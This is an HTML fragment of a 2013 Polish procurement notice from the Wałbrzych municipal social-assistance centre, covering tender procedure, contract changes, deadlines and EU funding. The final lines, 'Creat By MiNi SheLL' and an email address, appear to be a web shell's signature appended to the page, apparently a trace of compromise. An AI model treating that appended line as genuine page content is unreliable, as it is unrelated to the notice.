<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Zaświadczenie o wpisie do rejestru instytucji szkoleniowych prowadzonego przez Wojewódzki Urząd Pracy właściwy ze względu na siedzibę instytucji szkoleniowej, wydane zgodnie z art. 20 ust. 1 ustawy z dnia 20 kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający na podstawie art. 144 dopuści zmianę umowy dotyczącą przedmiotu 	zamówienia lub umówionego terminu wykonania zamówienia w następujących 	przypadkach: Zmiany terminu wykonania przedmiotu zamówienia, w szczególności w sytuacji wystąpienia okoliczności, których nie można było przewidzieć w chwili zawarcia umowy tj. z powodu okoliczności siły wyższej, wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć,w szczególności zagrażającego bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniem, szkody w znacznych rozmiarach. Zmiana terminu będzie  uzależniona od okresu działania siły wyższej oraz okresu potrzebnego do usunięcia skutków tego działania.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.mops.walbrzych.sisco.info/?przetargi=1<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej w Wałbrzychu, ul. Beethovena 1-2, 58-300 Wałbrzych - pok. 201.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.10.2013 godzina 10:00, miejsce: Miejski Ośrodek Pomocy Społecznej w Wałbrzychu, ul. Beethovena 1-2, 58-300 Wałbrzych - pok. 201.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie jest współfinansowane ze środków Unii Europejskiej w ramach  Europejskiego Funduszu Społecznego, Priorytet VII-Promocja integracji społecznej, Działanie 7.1 Rozwój i upowszechnienie aktywnej integracji, Poddziałanie 7.1.2 Rozwój i  upowszechnianie aktywnej integracji przez powiatowe centra pomocy rodzinie..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com